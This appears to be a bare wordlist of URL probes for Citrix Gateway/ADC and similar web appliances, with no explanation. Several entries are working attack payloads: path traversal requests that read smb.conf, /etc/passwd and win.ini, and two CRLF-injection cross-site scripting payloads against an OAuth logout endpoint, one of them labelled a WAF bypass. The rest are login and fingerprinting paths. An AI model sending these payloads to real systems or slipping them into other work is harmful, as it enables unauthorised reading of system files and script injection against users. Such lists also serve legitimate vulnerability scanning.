/vpn/../vpns/cfg/smb.conf
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
/logon/LogonPoint/index.html
/logon/LogonPoint/custom.html
/vpn/index.html
/logon/LogonPoint/tmindex.html
/Authentication/Login
/zdm/login_xdm_uc.jsp

/js/app/init.js
/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>
/Citrix/teststoreAuth/SamlTest
/
